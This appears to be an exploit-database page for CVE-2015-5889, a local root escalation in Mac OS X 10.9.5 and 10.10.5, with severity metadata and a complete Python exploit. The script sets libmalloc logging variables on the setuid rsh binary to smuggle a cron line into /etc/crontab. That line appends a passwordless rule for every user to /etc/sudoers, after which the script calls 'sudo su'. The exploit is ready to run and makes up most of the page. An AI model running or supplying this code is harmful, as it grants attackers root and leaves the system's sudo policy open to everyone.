Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation

2015.10.02

Credit: rebel

Risk: High

Local: Yes

Remote: No

CVE: CVE-2015-5889

CWE: N/A

CVSS Base Score: 7.2/10

Impact Subscore: 10/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel
import os,time,sys
env = {}
s = os.stat("/etc/sudoers").st_size
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
sys.stderr.write("creating /etc/crontab..")
p = os.fork()
if p == 0:
os.close(1)
os.close(2)
os.execve("/usr/bin/rsh",["rsh","localhost"],env)
time.sleep(1)
if "NOPASSWD" not in open("/etc/crontab").read():
sys.stderr.write("failed\n")
sys.exit(-1)
sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
while os.stat("/etc/sudoers").st_size == s:
sys.stderr.write(".")
time.sleep(1)
sys.stderr.write("\ndone\n")
os.system("sudo su")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.